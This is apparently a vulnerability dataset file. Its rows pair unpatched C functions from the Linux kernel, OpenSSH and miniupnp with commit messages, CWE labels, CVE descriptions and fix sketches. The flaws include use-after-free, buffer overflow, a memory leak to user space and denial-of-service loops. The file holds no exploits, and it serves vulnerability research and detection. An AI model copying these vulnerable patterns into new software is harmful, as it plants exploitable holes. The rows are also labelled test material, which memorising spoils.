if (parent) {
/* Creating passive conn */
if (parent->c_passive) {
trans->conn_free(conn->c_transport_data);
kmem_cache_free(rds_conn_slab, conn);
conn = parent->c_passive;
} else {
parent->c_passive = conn;
rds_cong_add_conn(conn);
rds_conn_count++;
}
} else {
/* Creating normal conn */
struct rds_connection *found;
if (!is_outgoing && otrans->t_type == RDS_TRANS_TCP)
found = NULL;
else
found = rds_conn_lookup(net, head, laddr, faddr, trans);
if (found) {
trans->conn_free(conn->c_transport_data);
kmem_cache_free(rds_conn_slab, conn);
conn = found;
} else {
if ((is_outgoing && otrans->t_type == RDS_TRANS_TCP) ||
(otrans->t_type != RDS_TRANS_TCP)) {
/* Only the active side should be added to
* reconnect list for TCP.
*/
hlist_add_head_rcu(&conn->c_hash_node, head);
}
rds_cong_add_conn(conn);
rds_conn_count++;
}
}
spin_unlock_irqrestore(&rds_conn_lock, flags);
out:
return conn;
}
| 192,605,127,811,959,800,000,000,000,000,000,000,000 | connection.c | 228,446,343,956,843,780,000,000,000,000,000,000,000 | [
"CWE-703"
] | CVE-2015-6937 | The __rds_conn_create function in net/rds/connection.c in the Linux kernel through 4.2.3 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by using a socket that was not properly bound. | https://nvd.nist.gov/vuln/detail/CVE-2015-6937 |
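A send on a never-bound socket reaches __rds_conn_create() with trans == NULL, and the function goes on to dereference it (trans->t_prefer_loopback, trans->conn_alloc). The commit adds the missing verification; the minimal shape of it is below, though the exact placement and error code are my assumption, not the verbatim upstream hunk:

	/* An unbound socket has no transport yet; refuse to build a
	 * connection instead of dereferencing NULL further down. */
	if (trans == NULL)
		return ERR_PTR(-ENODEV);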
1,442 | openssh-portable | 5e75f5198769056089fb06c4d738ab0e5abc66f7 | https://github.com/openssh/openssh-portable | https://github.com/openssh/openssh-portable/commit/5e75f5198769056089fb06c4d738ab0e5abc66f7 | set sshpam_ctxt to NULL after free
Avoids use-after-free in monitor when privsep child is compromised.
Reported by Moritz Jodeit; ok dtucker@ | 1 | mm_answer_pam_free_ctx(int sock, Buffer *m)
{
debug3("%s", __func__);
(sshpam_device.free_ctx)(sshpam_ctxt);
buffer_clear(m);
mm_request_send(sock, MONITOR_ANS_PAM_FREE_CTX, m);
auth_method = "keyboard-interactive";
auth_submethod = "pam";
return (sshpam_authok == sshpam_ctxt);
}
| 205,096,995,958,077,860,000,000,000,000,000,000,000 | monitor.c | 314,905,608,812,230,500,000,000,000,000,000,000,000 | [
"CWE-264"
] | CVE-2015-6564 | Use-after-free vulnerability in the mm_answer_pam_free_ctx function in monitor.c in sshd in OpenSSH before 7.0 on non-OpenBSD platforms might allow local users to gain privileges by leveraging control of the sshd uid to send an unexpectedly early MONITOR_REQ_PAM_FREE_CTX request. | https://nvd.nist.gov/vuln/detail/CVE-2015-6564 |
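The return statement above compares sshpam_authok against a context that has just been freed, and the stale sshpam_ctxt pointer survives the call. The fix computes the result first and then clears both globals; a sketch reconstructed from the commit message:

mm_answer_pam_free_ctx(int sock, Buffer *m)
{
	int r = sshpam_authok != NULL && sshpam_authok == sshpam_ctxt;

	debug3("%s", __func__);
	(sshpam_device.free_ctx)(sshpam_ctxt);
	sshpam_ctxt = sshpam_authok = NULL;	/* no dangling pointers */
	buffer_clear(m);
	mm_request_send(sock, MONITOR_ANS_PAM_FREE_CTX, m);
	auth_method = "keyboard-interactive";
	auth_submethod = "pam";
	return (r);				/* decided before the free */
}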
1,443 | openssh-portable | d4697fe9a28dab7255c60433e4dd23cf7fce8a8b | https://github.com/openssh/openssh-portable | https://github.com/openssh/openssh-portable/commit/d4697fe9a28dab7255c60433e4dd23cf7fce8a8b | Don't resend username to PAM; it already has it.
Pointed out by Moritz Jodeit; ok dtucker@ | 1 | mm_answer_pam_init_ctx(int sock, Buffer *m)
{
debug3("%s", __func__);
authctxt->user = buffer_get_string(m, NULL);
sshpam_ctxt = (sshpam_device.init_ctx)(authctxt);
sshpam_authok = NULL;
buffer_clear(m);
if (sshpam_ctxt != NULL) {
monitor_permit(mon_dispatch, MONITOR_REQ_PAM_FREE_CTX, 1);
buffer_put_int(m, 1);
} else {
buffer_put_int(m, 0);
}
mm_request_send(sock, MONITOR_ANS_PAM_INIT_CTX, m);
return (0);
}
| 77,335,835,840,341,280,000,000,000,000,000,000,000 | monitor.c | 287,714,491,034,327,250,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2015-6563 | The monitor component in sshd in OpenSSH before 7.0 on non-OpenBSD platforms accepts extraneous username data in MONITOR_REQ_PAM_INIT_CTX requests, which allows local users to conduct impersonation attacks by leveraging any SSH login access in conjunction with control of the sshd uid to send a crafted MONITOR_REQ_PWNAM request, related to monitor.c and monitor_wrap.c. | https://nvd.nist.gov/vuln/detail/CVE-2015-6563 |
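The monitor must not let the unprivileged child dictate which user PAM authenticates: the fix drops the buffer_get_string() and keeps the monitor's own authctxt->user. Sketch:

mm_answer_pam_init_ctx(int sock, Buffer *m)
{
	debug3("%s", __func__);
	/* authctxt->user was already set by the verified PWNAM step;
	 * nothing is read out of the (untrusted) request body. */
	sshpam_ctxt = (sshpam_device.init_ctx)(authctxt);
	sshpam_authok = NULL;
	buffer_clear(m);
	/* ... reply exactly as before ... */
}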
1,444 | openssh-portable | d4697fe9a28dab7255c60433e4dd23cf7fce8a8b | https://github.com/openssh/openssh-portable | https://github.com/openssh/openssh-portable/commit/d4697fe9a28dab7255c60433e4dd23cf7fce8a8b | Don't resend username to PAM; it already has it.
Pointed out by Moritz Jodeit; ok dtucker@ | 1 | mm_sshpam_init_ctx(Authctxt *authctxt)
{
Buffer m;
int success;
debug3("%s", __func__);
buffer_init(&m);
buffer_put_cstring(&m, authctxt->user);
mm_request_send(pmonitor->m_recvfd, MONITOR_REQ_PAM_INIT_CTX, &m);
debug3("%s: waiting for MONITOR_ANS_PAM_INIT_CTX", __func__);
mm_request_receive_expect(pmonitor->m_recvfd, MONITOR_ANS_PAM_INIT_CTX, &m);
success = buffer_get_int(&m);
if (success == 0) {
debug3("%s: pam_init_ctx failed", __func__);
buffer_free(&m);
return (NULL);
}
buffer_free(&m);
return (authctxt);
}
| 6,266,967,114,205,273,000,000,000,000,000,000,000 | monitor_wrap.c | 201,186,186,210,011,480,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2015-6563 | The monitor component in sshd in OpenSSH before 7.0 on non-OpenBSD platforms accepts extraneous username data in MONITOR_REQ_PAM_INIT_CTX requests, which allows local users to conduct impersonation attacks by leveraging any SSH login access in conjunction with control of the sshd uid to send a crafted MONITOR_REQ_PWNAM request, related to monitor.c and monitor_wrap.c. | https://nvd.nist.gov/vuln/detail/CVE-2015-6563 |
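The companion change on the unprivileged side simply stops serializing the username, since the monitor now ignores it. Sketch of the only affected lines:

	buffer_init(&m);
	/* buffer_put_cstring(&m, authctxt->user) removed: the monitor's
	 * own copy of the username is authoritative */
	mm_request_send(pmonitor->m_recvfd, MONITOR_REQ_PAM_INIT_CTX, &m);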
1,445 | linux | 9a5cbce421a283e6aea3c4007f141735bf9da8c3 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/9a5cbce421a283e6aea3c4007f141735bf9da8c3 | powerpc/perf: Cap 64bit userspace backtraces to PERF_MAX_STACK_DEPTH
We cap 32bit userspace backtraces to PERF_MAX_STACK_DEPTH
(currently 127), but we forgot to do the same for 64bit backtraces.
Cc: stable@vger.kernel.org
Signed-off-by: Anton Blanchard <anton@samba.org>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au> | 1 | static void perf_callchain_user_64(struct perf_callchain_entry *entry,
struct pt_regs *regs)
{
unsigned long sp, next_sp;
unsigned long next_ip;
unsigned long lr;
long level = 0;
struct signal_frame_64 __user *sigframe;
unsigned long __user *fp, *uregs;
next_ip = perf_instruction_pointer(regs);
lr = regs->link;
sp = regs->gpr[1];
perf_callchain_store(entry, next_ip);
for (;;) {
fp = (unsigned long __user *) sp;
if (!valid_user_sp(sp, 1) || read_user_stack_64(fp, &next_sp))
return;
if (level > 0 && read_user_stack_64(&fp[2], &next_ip))
return;
/*
* Note: the next_sp - sp >= signal frame size check
* is true when next_sp < sp, which can happen when
* transitioning from an alternate signal stack to the
* normal stack.
*/
if (next_sp - sp >= sizeof(struct signal_frame_64) &&
(is_sigreturn_64_address(next_ip, sp) ||
(level <= 1 && is_sigreturn_64_address(lr, sp))) &&
sane_signal_64_frame(sp)) {
/*
* This looks like a signal frame
*/
sigframe = (struct signal_frame_64 __user *) sp;
uregs = sigframe->uc.uc_mcontext.gp_regs;
if (read_user_stack_64(&uregs[PT_NIP], &next_ip) ||
read_user_stack_64(&uregs[PT_LNK], &lr) ||
read_user_stack_64(&uregs[PT_R1], &sp))
return;
level = 0;
perf_callchain_store(entry, PERF_CONTEXT_USER);
perf_callchain_store(entry, next_ip);
continue;
}
if (level == 0)
next_ip = lr;
perf_callchain_store(entry, next_ip);
++level;
sp = next_sp;
}
}
| 223,862,452,787,017,050,000,000,000,000,000,000,000 | callchain.c | 29,252,321,502,543,094,000,000,000,000,000,000,000 | [
"CWE-399"
] | CVE-2015-6526 | The perf_callchain_user_64 function in arch/powerpc/perf/callchain.c in the Linux kernel before 4.0.2 on ppc64 platforms allows local users to cause a denial of service (infinite loop) via a deep 64-bit userspace backtrace. | https://nvd.nist.gov/vuln/detail/CVE-2015-6526 |
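The fix swaps the unbounded for (;;) for the same cap the 32-bit walker already enforces, so a hostile or cyclic user stack can contribute at most PERF_MAX_STACK_DEPTH entries. Sketch:

	while (entry->nr < PERF_MAX_STACK_DEPTH) {
		fp = (unsigned long __user *) sp;
		if (!valid_user_sp(sp, 1) || read_user_stack_64(fp, &next_sp))
			return;
		/* ... loop body unchanged ... */
		sp = next_sp;
	}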
1,449 | linux | 7932c0bd7740f4cd2aa168d3ce0199e7af7d72d5 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/7932c0bd7740f4cd2aa168d3ce0199e7af7d72d5 | vhost: actually track log eventfd file
While reviewing vhost log code, I found out that log_file is never
set. Note: I haven't tested the change (QEMU doesn't use LOG_FD yet).
Cc: stable@vger.kernel.org
Signed-off-by: Marc-André Lureau <marcandre.lureau@redhat.com>
Signed-off-by: Michael S. Tsirkin <mst@redhat.com> | 1 | long vhost_dev_ioctl(struct vhost_dev *d, unsigned int ioctl, void __user *argp)
{
struct file *eventfp, *filep = NULL;
struct eventfd_ctx *ctx = NULL;
u64 p;
long r;
int i, fd;
/* If you are not the owner, you can become one */
if (ioctl == VHOST_SET_OWNER) {
r = vhost_dev_set_owner(d);
goto done;
}
/* You must be the owner to do anything else */
r = vhost_dev_check_owner(d);
if (r)
goto done;
switch (ioctl) {
case VHOST_SET_MEM_TABLE:
r = vhost_set_memory(d, argp);
break;
case VHOST_SET_LOG_BASE:
if (copy_from_user(&p, argp, sizeof p)) {
r = -EFAULT;
break;
}
if ((u64)(unsigned long)p != p) {
r = -EFAULT;
break;
}
for (i = 0; i < d->nvqs; ++i) {
struct vhost_virtqueue *vq;
void __user *base = (void __user *)(unsigned long)p;
vq = d->vqs[i];
mutex_lock(&vq->mutex);
/* If ring is inactive, will check when it's enabled. */
if (vq->private_data && !vq_log_access_ok(vq, base))
r = -EFAULT;
else
vq->log_base = base;
mutex_unlock(&vq->mutex);
}
break;
case VHOST_SET_LOG_FD:
r = get_user(fd, (int __user *)argp);
if (r < 0)
break;
eventfp = fd == -1 ? NULL : eventfd_fget(fd);
if (IS_ERR(eventfp)) {
r = PTR_ERR(eventfp);
break;
}
if (eventfp != d->log_file) {
filep = d->log_file;
ctx = d->log_ctx;
d->log_ctx = eventfp ?
eventfd_ctx_fileget(eventfp) : NULL;
} else
filep = eventfp;
for (i = 0; i < d->nvqs; ++i) {
mutex_lock(&d->vqs[i]->mutex);
d->vqs[i]->log_ctx = d->log_ctx;
mutex_unlock(&d->vqs[i]->mutex);
}
if (ctx)
eventfd_ctx_put(ctx);
if (filep)
fput(filep);
break;
default:
r = -ENOIOCTLCMD;
break;
}
done:
return r;
}
| 259,350,127,464,630,780,000,000,000,000,000,000,000 | vhost.c | 299,385,267,607,711,380,000,000,000,000,000,000,000 | [
"CWE-399"
] | CVE-2015-6252 | The vhost_dev_ioctl function in drivers/vhost/vhost.c in the Linux kernel before 4.1.5 allows local users to cause a denial of service (memory consumption) via a VHOST_SET_LOG_FD ioctl call that triggers permanent file-descriptor allocation. | https://nvd.nist.gov/vuln/detail/CVE-2015-6252 |
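The one-line fix: record the new eventfd file in d->log_file, mirroring what is already done for d->log_ctx, so repeated VHOST_SET_LOG_FD calls release the previous file instead of leaking it. Sketch of the corrected branch:

		if (eventfp != d->log_file) {
			filep = d->log_file;
			d->log_file = eventfp;		/* the missing assignment */
			ctx = d->log_ctx;
			d->log_ctx = eventfp ?
				eventfd_ctx_fileget(eventfp) : NULL;
		} else
			filep = eventfp;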
1,450 | miniupnp | 79cca974a4c2ab1199786732a67ff6d898051b78 | https://github.com/miniupnp/miniupnp | https://github.com/miniupnp/miniupnp/commit/79cca974a4c2ab1199786732a67ff6d898051b78 | igd_desc_parse.c: fix buffer overflow | 1 | void IGDstartelt(void * d, const char * name, int l)
{
struct IGDdatas * datas = (struct IGDdatas *)d;
memcpy( datas->cureltname, name, l);
datas->cureltname[l] = '\0';
datas->level++;
if( (l==7) && !memcmp(name, "service", l) ) {
datas->tmp.controlurl[0] = '\0';
datas->tmp.eventsuburl[0] = '\0';
datas->tmp.scpdurl[0] = '\0';
datas->tmp.servicetype[0] = '\0';
}
}
| 81,376,760,744,966,150,000,000,000,000,000,000,000 | igd_desc_parse.c | 340,208,766,696,793,100,000,000,000,000,000,000,000 | [
"CWE-119"
] | CVE-2015-6031 | Buffer overflow in the IGDstartelt function in igd_desc_parse.c in the MiniUPnP client (aka MiniUPnPc) before 1.9.20150917 allows remote UPNP servers to cause a denial of service (application crash) and possibly execute arbitrary code via an "oversized" XML element name. | https://nvd.nist.gov/vuln/detail/CVE-2015-6031 |
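The memcpy() above trusts the caller-supplied element-name length l, overflowing the fixed-size datas->cureltname buffer. The fix clamps the length to the buffer size first; in this sketch MINIUPNPC_URL_MAXSIZE stands for cureltname's declared size in igd_desc_parse.h:

void IGDstartelt(void * d, const char * name, int l)
{
	struct IGDdatas * datas = (struct IGDdatas *)d;
	if(l >= MINIUPNPC_URL_MAXSIZE)
		l = MINIUPNPC_URL_MAXSIZE - 1;	/* keep room for the NUL */
	memcpy(datas->cureltname, name, l);
	datas->cureltname[l] = '\0';
	/* ... rest unchanged ... */
}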
1,451 | linux | f15133df088ecadd141ea1907f2c96df67c729f0 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/f15133df088ecadd141ea1907f2c96df67c729f0 | path_openat(): fix double fput()
path_openat() jumps to the wrong place after do_tmpfile() - it has
already done path_cleanup() (as part of path_lookupat() called by
do_tmpfile()), so doing that again can lead to double fput().
Cc: stable@vger.kernel.org # v3.11+
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk> | 1 | static struct file *path_openat(int dfd, struct filename *pathname,
struct nameidata *nd, const struct open_flags *op, int flags)
{
struct file *file;
struct path path;
int opened = 0;
int error;
file = get_empty_filp();
if (IS_ERR(file))
return file;
file->f_flags = op->open_flag;
if (unlikely(file->f_flags & __O_TMPFILE)) {
error = do_tmpfile(dfd, pathname, nd, flags, op, file, &opened);
goto out;
}
error = path_init(dfd, pathname, flags, nd);
if (unlikely(error))
goto out;
error = do_last(nd, &path, file, op, &opened, pathname);
while (unlikely(error > 0)) { /* trailing symlink */
struct path link = path;
void *cookie;
if (!(nd->flags & LOOKUP_FOLLOW)) {
path_put_conditional(&path, nd);
path_put(&nd->path);
error = -ELOOP;
break;
}
error = may_follow_link(&link, nd);
if (unlikely(error))
break;
nd->flags |= LOOKUP_PARENT;
nd->flags &= ~(LOOKUP_OPEN|LOOKUP_CREATE|LOOKUP_EXCL);
error = follow_link(&link, nd, &cookie);
if (unlikely(error))
break;
error = do_last(nd, &path, file, op, &opened, pathname);
put_link(nd, &link, cookie);
}
out:
path_cleanup(nd);
if (!(opened & FILE_OPENED)) {
BUG_ON(!error);
put_filp(file);
}
if (unlikely(error)) {
if (error == -EOPENSTALE) {
if (flags & LOOKUP_RCU)
error = -ECHILD;
else
error = -ESTALE;
}
file = ERR_PTR(error);
}
return file;
}
| 75,770,052,784,686,880,000,000,000,000,000,000,000 | namei.c | 323,949,164,317,720,170,000,000,000,000,000,000,000 | [
"CWE-416"
] | CVE-2015-5706 | Use-after-free vulnerability in the path_openat function in fs/namei.c in the Linux kernel 3.x and 4.x before 4.0.4 allows local users to cause a denial of service or possibly have unspecified other impact via O_TMPFILE filesystem operations that leverage a duplicate cleanup operation. | https://nvd.nist.gov/vuln/detail/CVE-2015-5706 |
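Because do_tmpfile() calls path_lookupat() internally, nd is already cleaned up when it returns; falling through to out runs path_cleanup() a second time, which is the double fput(). The fix routes the tmpfile branch past the cleanup. Sketch of the exit path, with the label name taken from my reading of the upstream patch:

	if (unlikely(file->f_flags & __O_TMPFILE)) {
		error = do_tmpfile(dfd, pathname, nd, flags, op, file, &opened);
		goto out2;	/* nd already cleaned up inside do_tmpfile() */
	}
	/* ... */
out:
	path_cleanup(nd);
out2:
	if (!(opened & FILE_OPENED)) {
		BUG_ON(!error);
		put_filp(file);
	}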
1,452 | linux | b6878d9e03043695dbf3fa1caa6dfc09db225b16 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/b6878d9e03043695dbf3fa1caa6dfc09db225b16 | md: use kzalloc() when bitmap is disabled
In drivers/md/md.c get_bitmap_file() uses kmalloc() for creating a
mdu_bitmap_file_t called "file".
5769 file = kmalloc(sizeof(*file), GFP_NOIO);
5770 if (!file)
5771 return -ENOMEM;
This structure is copied to user space at the end of the function.
5786 if (err == 0 &&
5787 copy_to_user(arg, file, sizeof(*file)))
5788 err = -EFAULT
But if bitmap is disabled only the first byte of "file" is initialized
with zero, so it's possible to read some bytes (up to 4095) of kernel
space memory from user space. This is an information leak.
5775 /* bitmap disabled, zero the first byte and copy out */
5776 if (!mddev->bitmap_info.file)
5777 file->pathname[0] = '\0';
Signed-off-by: Benjamin Randazzo <benjamin@randazzo.fr>
Signed-off-by: NeilBrown <neilb@suse.com> | 1 | static int get_bitmap_file(struct mddev *mddev, void __user * arg)
{
mdu_bitmap_file_t *file = NULL; /* too big for stack allocation */
char *ptr;
int err;
file = kmalloc(sizeof(*file), GFP_NOIO);
if (!file)
return -ENOMEM;
err = 0;
spin_lock(&mddev->lock);
/* bitmap disabled, zero the first byte and copy out */
if (!mddev->bitmap_info.file)
file->pathname[0] = '\0';
else if ((ptr = file_path(mddev->bitmap_info.file,
file->pathname, sizeof(file->pathname))),
IS_ERR(ptr))
err = PTR_ERR(ptr);
else
memmove(file->pathname, ptr,
sizeof(file->pathname)-(ptr-file->pathname));
spin_unlock(&mddev->lock);
if (err == 0 &&
copy_to_user(arg, file, sizeof(*file)))
err = -EFAULT;
kfree(file);
return err;
}
| 233,692,859,281,768,060,000,000,000,000,000,000,000 | md.c | 31,073,914,606,817,860,000,000,000,000,000,000,000 | [
"CWE-200"
] | CVE-2015-5697 | The get_bitmap_file function in drivers/md/md.c in the Linux kernel before 4.1.6 does not initialize a certain bitmap data structure, which allows local users to obtain sensitive information from kernel memory via a GET_BITMAP_FILE ioctl call. | https://nvd.nist.gov/vuln/detail/CVE-2015-5697 |
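The subject line is the whole fix: allocate zeroed memory, so that when the bitmap is disabled and only pathname[0] is written, the copy_to_user() at the end cannot ship stale heap contents.

	file = kzalloc(sizeof(*file), GFP_NOIO);	/* was kmalloc() */
	if (!file)
		return -ENOMEM;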
1,453 | linux | beb39db59d14990e401e235faf66a6b9b31240b0 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/beb39db59d14990e401e235faf66a6b9b31240b0 | udp: fix behavior of wrong checksums
We have two problems in the UDP stack related to bogus checksums:
1) We return -EAGAIN to the application even if the receive queue is not empty.
This breaks applications using edge-triggered epoll()
2) Under UDP flood, we can loop forever without yielding to other
processes, potentially hanging the host, especially on non-SMP systems.
This patch is an attempt to make things better.
We might in the future add extra support for rt applications
wanting to better control time spent doing a recv() in a hostile
environment. For example we could validate checksums before queuing
packets in socket receive queue.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | int udp_recvmsg(struct sock *sk, struct msghdr *msg, size_t len, int noblock,
int flags, int *addr_len)
{
struct inet_sock *inet = inet_sk(sk);
DECLARE_SOCKADDR(struct sockaddr_in *, sin, msg->msg_name);
struct sk_buff *skb;
unsigned int ulen, copied;
int peeked, off = 0;
int err;
int is_udplite = IS_UDPLITE(sk);
bool slow;
if (flags & MSG_ERRQUEUE)
return ip_recv_error(sk, msg, len, addr_len);
try_again:
skb = __skb_recv_datagram(sk, flags | (noblock ? MSG_DONTWAIT : 0),
&peeked, &off, &err);
if (!skb)
goto out;
ulen = skb->len - sizeof(struct udphdr);
copied = len;
if (copied > ulen)
copied = ulen;
else if (copied < ulen)
msg->msg_flags |= MSG_TRUNC;
/*
* If checksum is needed at all, try to do it while copying the
* data. If the data is truncated, or if we only want a partial
* coverage checksum (UDP-Lite), do it before the copy.
*/
if (copied < ulen || UDP_SKB_CB(skb)->partial_cov) {
if (udp_lib_checksum_complete(skb))
goto csum_copy_err;
}
if (skb_csum_unnecessary(skb))
err = skb_copy_datagram_msg(skb, sizeof(struct udphdr),
msg, copied);
else {
err = skb_copy_and_csum_datagram_msg(skb, sizeof(struct udphdr),
msg);
if (err == -EINVAL)
goto csum_copy_err;
}
if (unlikely(err)) {
trace_kfree_skb(skb, udp_recvmsg);
if (!peeked) {
atomic_inc(&sk->sk_drops);
UDP_INC_STATS_USER(sock_net(sk),
UDP_MIB_INERRORS, is_udplite);
}
goto out_free;
}
if (!peeked)
UDP_INC_STATS_USER(sock_net(sk),
UDP_MIB_INDATAGRAMS, is_udplite);
sock_recv_ts_and_drops(msg, sk, skb);
/* Copy the address. */
if (sin) {
sin->sin_family = AF_INET;
sin->sin_port = udp_hdr(skb)->source;
sin->sin_addr.s_addr = ip_hdr(skb)->saddr;
memset(sin->sin_zero, 0, sizeof(sin->sin_zero));
*addr_len = sizeof(*sin);
}
if (inet->cmsg_flags)
ip_cmsg_recv_offset(msg, skb, sizeof(struct udphdr));
err = copied;
if (flags & MSG_TRUNC)
err = ulen;
out_free:
skb_free_datagram_locked(sk, skb);
out:
return err;
csum_copy_err:
slow = lock_sock_fast(sk);
if (!skb_kill_datagram(sk, skb, flags)) {
UDP_INC_STATS_USER(sock_net(sk), UDP_MIB_CSUMERRORS, is_udplite);
UDP_INC_STATS_USER(sock_net(sk), UDP_MIB_INERRORS, is_udplite);
}
unlock_sock_fast(sk, slow);
if (noblock)
return -EAGAIN;
/* starting over for a new packet */
msg->msg_flags &= ~MSG_TRUNC;
goto try_again;
}
| 200,373,655,058,309,960,000,000,000,000,000,000,000 | udp.c | 207,907,517,686,896,670,000,000,000,000,000,000,000 | [
"CWE-399"
] | CVE-2015-5366 | The (1) udp_recvmsg and (2) udpv6_recvmsg functions in the Linux kernel before 4.0.6 provide inappropriate -EAGAIN return values, which allows remote attackers to cause a denial of service (EPOLLET epoll application read outage) via an incorrect checksum in a UDP packet, a different vulnerability than CVE-2015-5364. | https://nvd.nist.gov/vuln/detail/CVE-2015-5366 |
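Both listed problems are fixed in the csum_copy_err tail: the -EAGAIN short-circuit for non-blocking sockets is removed (problem 1) and a cond_resched() breaks the flood livelock (problem 2). Sketch of the corrected tail:

csum_copy_err:
	slow = lock_sock_fast(sk);
	if (!skb_kill_datagram(sk, skb, flags)) {
		UDP_INC_STATS_USER(sock_net(sk), UDP_MIB_CSUMERRORS, is_udplite);
		UDP_INC_STATS_USER(sock_net(sk), UDP_MIB_INERRORS, is_udplite);
	}
	unlock_sock_fast(sk, slow);

	/* starting over for a new packet, but check if we need to yield */
	cond_resched();
	msg->msg_flags &= ~MSG_TRUNC;
	goto try_again;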
1,454 | linux | beb39db59d14990e401e235faf66a6b9b31240b0 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/beb39db59d14990e401e235faf66a6b9b31240b0 | udp: fix behavior of wrong checksums
We have two problems in the UDP stack related to bogus checksums:
1) We return -EAGAIN to the application even if the receive queue is not empty.
This breaks applications using edge-triggered epoll()
2) Under UDP flood, we can loop forever without yielding to other
processes, potentially hanging the host, especially on non-SMP systems.
This patch is an attempt to make things better.
We might in the future add extra support for rt applications
wanting to better control time spent doing a recv() in a hostile
environment. For example we could validate checksums before queuing
packets in socket receive queue.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | int udpv6_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
int noblock, int flags, int *addr_len)
{
struct ipv6_pinfo *np = inet6_sk(sk);
struct inet_sock *inet = inet_sk(sk);
struct sk_buff *skb;
unsigned int ulen, copied;
int peeked, off = 0;
int err;
int is_udplite = IS_UDPLITE(sk);
int is_udp4;
bool slow;
if (flags & MSG_ERRQUEUE)
return ipv6_recv_error(sk, msg, len, addr_len);
if (np->rxpmtu && np->rxopt.bits.rxpmtu)
return ipv6_recv_rxpmtu(sk, msg, len, addr_len);
try_again:
skb = __skb_recv_datagram(sk, flags | (noblock ? MSG_DONTWAIT : 0),
&peeked, &off, &err);
if (!skb)
goto out;
ulen = skb->len - sizeof(struct udphdr);
copied = len;
if (copied > ulen)
copied = ulen;
else if (copied < ulen)
msg->msg_flags |= MSG_TRUNC;
is_udp4 = (skb->protocol == htons(ETH_P_IP));
/*
* If checksum is needed at all, try to do it while copying the
* data. If the data is truncated, or if we only want a partial
* coverage checksum (UDP-Lite), do it before the copy.
*/
if (copied < ulen || UDP_SKB_CB(skb)->partial_cov) {
if (udp_lib_checksum_complete(skb))
goto csum_copy_err;
}
if (skb_csum_unnecessary(skb))
err = skb_copy_datagram_msg(skb, sizeof(struct udphdr),
msg, copied);
else {
err = skb_copy_and_csum_datagram_msg(skb, sizeof(struct udphdr), msg);
if (err == -EINVAL)
goto csum_copy_err;
}
if (unlikely(err)) {
trace_kfree_skb(skb, udpv6_recvmsg);
if (!peeked) {
atomic_inc(&sk->sk_drops);
if (is_udp4)
UDP_INC_STATS_USER(sock_net(sk),
UDP_MIB_INERRORS,
is_udplite);
else
UDP6_INC_STATS_USER(sock_net(sk),
UDP_MIB_INERRORS,
is_udplite);
}
goto out_free;
}
if (!peeked) {
if (is_udp4)
UDP_INC_STATS_USER(sock_net(sk),
UDP_MIB_INDATAGRAMS, is_udplite);
else
UDP6_INC_STATS_USER(sock_net(sk),
UDP_MIB_INDATAGRAMS, is_udplite);
}
sock_recv_ts_and_drops(msg, sk, skb);
/* Copy the address. */
if (msg->msg_name) {
DECLARE_SOCKADDR(struct sockaddr_in6 *, sin6, msg->msg_name);
sin6->sin6_family = AF_INET6;
sin6->sin6_port = udp_hdr(skb)->source;
sin6->sin6_flowinfo = 0;
if (is_udp4) {
ipv6_addr_set_v4mapped(ip_hdr(skb)->saddr,
&sin6->sin6_addr);
sin6->sin6_scope_id = 0;
} else {
sin6->sin6_addr = ipv6_hdr(skb)->saddr;
sin6->sin6_scope_id =
ipv6_iface_scope_id(&sin6->sin6_addr,
inet6_iif(skb));
}
*addr_len = sizeof(*sin6);
}
if (np->rxopt.all)
ip6_datagram_recv_common_ctl(sk, msg, skb);
if (is_udp4) {
if (inet->cmsg_flags)
ip_cmsg_recv(msg, skb);
} else {
if (np->rxopt.all)
ip6_datagram_recv_specific_ctl(sk, msg, skb);
}
err = copied;
if (flags & MSG_TRUNC)
err = ulen;
out_free:
skb_free_datagram_locked(sk, skb);
out:
return err;
csum_copy_err:
slow = lock_sock_fast(sk);
if (!skb_kill_datagram(sk, skb, flags)) {
if (is_udp4) {
UDP_INC_STATS_USER(sock_net(sk),
UDP_MIB_CSUMERRORS, is_udplite);
UDP_INC_STATS_USER(sock_net(sk),
UDP_MIB_INERRORS, is_udplite);
} else {
UDP6_INC_STATS_USER(sock_net(sk),
UDP_MIB_CSUMERRORS, is_udplite);
UDP6_INC_STATS_USER(sock_net(sk),
UDP_MIB_INERRORS, is_udplite);
}
}
unlock_sock_fast(sk, slow);
if (noblock)
return -EAGAIN;
/* starting over for a new packet */
msg->msg_flags &= ~MSG_TRUNC;
goto try_again;
}
| 122,715,536,700,597,060,000,000,000,000,000,000,000 | udp.c | 240,477,898,096,045,670,000,000,000,000,000,000,000 | [
"CWE-399"
] | CVE-2015-5366 | The (1) udp_recvmsg and (2) udpv6_recvmsg functions in the Linux kernel before 4.0.6 provide inappropriate -EAGAIN return values, which allows remote attackers to cause a denial of service (EPOLLET epoll application read outage) via an incorrect checksum in a UDP packet, a different vulnerability than CVE-2015-5364. | https://nvd.nist.gov/vuln/detail/CVE-2015-5366 |
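udpv6_recvmsg() receives the identical change; only the IPv4/IPv6 stats accounting above the unlock differs. Sketch of the shared tail:

	unlock_sock_fast(sk, slow);

	/* starting over for a new packet, but check if we need to yield */
	cond_resched();
	msg->msg_flags &= ~MSG_TRUNC;
	goto try_again;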
1,455 | linux | 54a20552e1eae07aa240fa370a0293e006b5faed | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/54a20552e1eae07aa240fa370a0293e006b5faed | KVM: x86: work around infinite loop in microcode when #AC is delivered
It was found that a guest can DoS a host by triggering an infinite
stream of "alignment check" (#AC) exceptions. This causes the
microcode to enter an infinite loop where the core never receives
another interrupt. The host kernel panics pretty quickly due to the
effects (CVE-2015-5307).
Signed-off-by: Eric Northup <digitaleric@google.com>
Cc: stable@vger.kernel.org
